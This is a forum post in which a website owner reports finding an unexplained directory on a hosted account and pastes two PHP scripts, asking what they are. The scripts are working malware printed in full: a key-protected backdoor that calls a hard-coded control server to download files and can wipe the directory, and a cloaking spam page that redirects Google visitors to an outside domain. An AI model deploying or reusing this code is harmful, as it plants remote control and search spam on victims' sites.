|
Inactive
Join Date: Jun 2003
Location: I am house...
Services: $KY+HD - BT Infinity
Posts: 2,284
|
Hacked? - Found some strange directories in my root
I have a hosted account for my domain and recently found a directory under the /public_html/ with random letters for the directory name and a couple of scripts within including a file that is building up logging information.
Directory perms were 777 (I did not create it!)
I included the content of the scripts below - Anyone know what it is, where it came from or what it is used to do??
INDEX.PHP includes:
PHP Code:
<?php
$k='6fb8e25b609624dc10a68641e846102a';if ($k != md5($_GET['k'])) { echo'nk'; exit; }
$ctl="188.124.3.195";$ctlp="/ctl.php";$c=$_GET[c];
if ($c=='init'){doinit();}if ($c=='check'){docheck();}if ($c=='get'){doget();}if ($c=='del'){dodel();}
function dodel() {
if ($_GET[all]==1) {
$d="."; $dh=opendir($d);
while (($f=readdir($dh)) != false) { $c++; if ($f!="."&&$f!=".."){unlink($f);} } closedir($dh);
$d="cache"; $dh=opendir($d);
while (($f=readdir($dh)) != false) { $c++; if ($f!="."&&$f!=".."){unlink("cache/$f");} } closedir($dh); rmdir("cache"); echo $c;
} else { $fd=fopen("index.html","w");fclose($fd);unlink(basename($_SERVER[PHP_SELF]));}
}
function doget() {
global $ctlp, $ctl; $a = $_GET[a];
$lname = basename($a);
$b=dirname($ctlp);
echo "$b$a";
if (eregi("php$",$lname)){$a1 = str_replace("php", "txt", $a);}
else{$a1=$a;}
$fd=fopen($lname,"w");
$d = g($ctl,80,"$b$a1");
fwrite($fd,$d); fclose($fd);
echo "'".strlen($d)."'";
}
function doinit() {
global$ctl,$ctlp;$b=mkdir("cache");if(!$b){echo '0';exit;}echo g($ctl,80,$ctlp."?c=init&me=".base64_encode(getme()));
}
function docheck(){
echo getme();if (fopen("tmp","w")) {echo";1";}else{echo";0";}
}
function getme() { return "http://".$_SERVER[HTTP_HOST]."".$_SERVER[PHP_SELF]; }
function g($server, $port, $file) {
$socket=fsockopen($server,$port,$errno,$errstr,60) or die("Can't open socket");
$refer = $_SERVER['HTTP_HOST']?$_SERVER['HTTP_HOST']:$server;
fputs($socket, "GET $file HTTP/1.0\r\n");
fputs($socket, "Host: $server\r\n\r\n");
$dat = '';
do {$dat .= fgets ($socket, 1024);} while (strpos($dat,"\r\n\r\n") === false);
$dat = '';
while (!feof($socket)) {$dat .= fread($socket,8192);}
fclose($socket);
return $dat;
}
?>
XTYB.PHP includes:
PHP Code:
<?php
dolog();
error_reporting(0);
$nr=rand(9,11);
list($arg,$val)=@each($_GET);
$t=base64_decode("PEhUTUw+DQogICAgPEhFQUQ+DQogICAgICAgIDxUSVRMRT4jdGl0bGUjPC9USVRMRT4gICAgIA0KICAgICAgICA8c3R5bGU+DQpIMw0Kew0KCW1hcmdpbi1sZWZ0OjEuNThlbTsNCn0NCkg0DQp7IA0KCW1hcmdpbi1sZWZ0OjMuMTZlbTsNCn0NCkg1DQp7DQoJbWFyZ2luLWxlZnQ6NC43NGVtOw0KfQ0KLmhvdXNlYnV0dG9uIHsNCglmb250LXdlaWdodDogYm9sZDsNCgl0ZXh0LWFsaWduOiBjZW50ZXI7DQoJbWFyZ2luLWJvdHRvbTogMnB4Ow0KCW1hcmdpbi10b3A6IDJweDsNCgl3aWR0aDphdXRvOw0KfQ0KPC9zdHlsZT4NCiAgICA8L0hFQUQ+DQo8Qk9EWT4NCjxESVYgSUQ9Im5hdmlnYXRvciI+DQoJPFRBQkxFIElEPSJUYWJsZTEiPg0KDQoJCTxUUj4NCgkJCTxURD4gLyA8L1REPg0KCQk8L1RSPg0KDQoJPC9UQUJMRT4NCjwvRElWPg0KDQo8UD4NCg0KI2NvbnRlbnQjDQoNCg0KPC9CT0RZPg0KPC9IVE1MPg0K");
$g = checkg($_SERVER[REMOTE_ADDR]);
if (!$g) {if(eregi("google",$_SERVER[HTTP_REFERER])){
$self=$_SERVER[HTTP_HOST].$_SERVER[REQUEST_URI];
$goto='http://longsignups.net/in.cgi?7&ref='.urlencode($_SERVER[HTTP_REFERER])."&page=".urlencode($self);
header("Location: $goto");exit;}}
$q = str_replace("-", " ", urldecode($_GET[$arg]));
$c=1;
$kws = @file('kw.txt');foreach($kws as $k) { if ($c==$id) { $q = trim($k); } $tmp[]=trim($k); } $kws = $tmp;
if (!in_array($q,$kws)){echo '404';exit;}
shuffle($kws);$rl = array_splice($kws,0,$nr);
foreach($rl as $r) { $rrl[] = "<a href=\"?$arg=".urlencode(str_replace(" ", "-", $r))."\">$r</a>"; }
$h=md5($q); if(file_exists("cache/$h")){echo join('',file("cache/$h"));exit;}
$c=gets2($q);
$t=str_replace("#title#",ucwords($q),$t);
$t=str_replace("#kw#",$q,$t);
$cont = array_merge($c, $rrl);
//$cont = $c;
shuffle($cont);
$t=str_replace("#content#",join(' ',$cont),$t);
$t=str_replace("#relink#",join(' ', ''),$t);
$t = preg_replace_callback("/#rnum#/",create_function('$matches','return gp();'), $t);
$f=@fopen("cache/$h","w");fwrite($f,$t);fclose($f);
echo $t;exit;
function dolog() {
$str = "$_SERVER[REMOTE_ADDR] -- ".date("Y-m-d H:i:s")." -- $_SERVER[SERVER_NAME] -- $_SERVER[REQUEST_URI] -- $_SERVER[HTTP_REFERER] -- $_SERVER[HTTP_USER_AGENT]\n"; $lp = "evekwalicu.txt"; $fd = fopen($lp, "a");fwrite($fd, $str); fclose($fd);
}
function gets2($kw) {
$sc = 40;
$kw =trim($kw);
$base = "/WebSearchService/rss/webSearch.xml?appid=yahoosearchwebrss&results=$sc&query=".urlencode($kw)."&adult_ok=1";
$req = $base;
$s = @fsockopen("api.search.yahoo.com", 80, $_en, $_er, 10);
$rstr = "GET $req HTTP/1.0\r\n";
$rstr .= "Host: api.search.yahoo.com\r\n";
$rstr .= "\r\n";
@fwrite($s,$rstr);
$dat='';
do {$dat .= fgets ($s);} while (strpos($dat,"\r\n\r\n") === false);
$dat='';
while (!feof($s)) {$dat .= fread($s,8192);}
$c = $dat;
@fclose($s);
$r = preg_match_all("/<item>(.+?)<\/item>/", $c, $na);
if ($r < 3) { return 0; }
$ret = array();
for($i=1;$i<sizeof($na[1]);$i++) {
$tmp = $na[1][$i];
@eregi('<title>(.+)</title>', $tmp, $na2);
$title = $na2[1];
@eregi('<description>(.+)</description>', $tmp, $na2);
$description = $na2[1];
$description = str_replace("...", ".", $description);
@eregi('<link>(.+)</link>', $tmp, $na2);
$link = $na2[1];
//$ret[] = array($link, $title, $description);
//if ($i==1) {
$ret[] = "\n\n<p><a href=\"$link\">$title</a> $description";
//} else {
// $ret[] = " <br>$title $description ";
//}
}
$ret[] = "<P>";
$ret[] = "<P>";
$ret[] = "<P>";
shuffle($ret); return $ret;
}
function checkg($ip) {
$nfilter = split("\n", "72.14.192.0/18
74.125.0.0/16
64.233.160.0/19
66.249.64.0/19");
foreach ($nfilter as $f) {
if (ip_in_range($ip, $f)) { return 1; }
} return 0;
}
Function decbin32 ($dec) { return str_pad(decbin($dec), 32, '0', STR_PAD_LEFT); }
Function ip_in_range($ip, $range) {
if (strpos($range, '/') !== false) {
list($range, $netmask) = explode('/', $range, 2);
if (strpos($netmask, '.') !== false) {
$netmask = str_replace('*', '0', $netmask);
$netmask_dec = ip2long($netmask);
return ( (ip2long($ip) & $netmask_dec) == (ip2long($range) & $netmask_dec) );
} else {
$x = explode('.', $range);
while(count($x)<4) $x[] = '0';
list($a,$b,$c,$d) = $x;
$range = sprintf("%u.%u.%u.%u", empty($a)?'0':$a, empty($b)?'0':$b,empty($c)?'0':$c,empty($d)?'0':$d);
$range_dec = ip2long($range);
$ip_dec = ip2long($ip);
$broadcast_dec = bindec(substr(decbin32($range_dec), 0, $netmask)
. str_pad('', 32-$netmask, '1'));
$wildcard_dec = pow(2, (32-$netmask)) - 1;
$broadcast_dec = $range_dec | $wildcard_dec;
return (($ip_dec & $broadcast_dec) == $ip_dec);
}
} else {
if (strpos($range, '*') !==false) { // a.b.*.* format
$lower = str_replace('*', '0', $range);
$upper = str_replace('*', '255', $range);
$range = "$lower-$upper";
}
if (strpos($range, '-')!==false) { // A-B format
list($lower, $upper) = explode('-', $range, 2);
$lower_dec = ip2long($lower);
$upper_dec = ip2long($upper);
$ip_dec = ip2long($ip);
return ( ($ip_dec>=$lower_dec) && ($ip_dec<=$upper_dec) );
}
return false;
}
$ip_dec = ip2long($ip);
return (($ip_dec & $netmask_dec) == $ip_dec);
}
function gp ($length = 4)
{
$password = "";
$possible = "abcdfghjkmnpqrstvwxyz";
$i = 0;
while ($i < $length) {
$char = substr($possible, mt_rand(0, strlen($possible)-1), 1);
if (!strstr($password, $char)) {
$password .= $char;
$i++;
}
}
return $password;
}
?>
|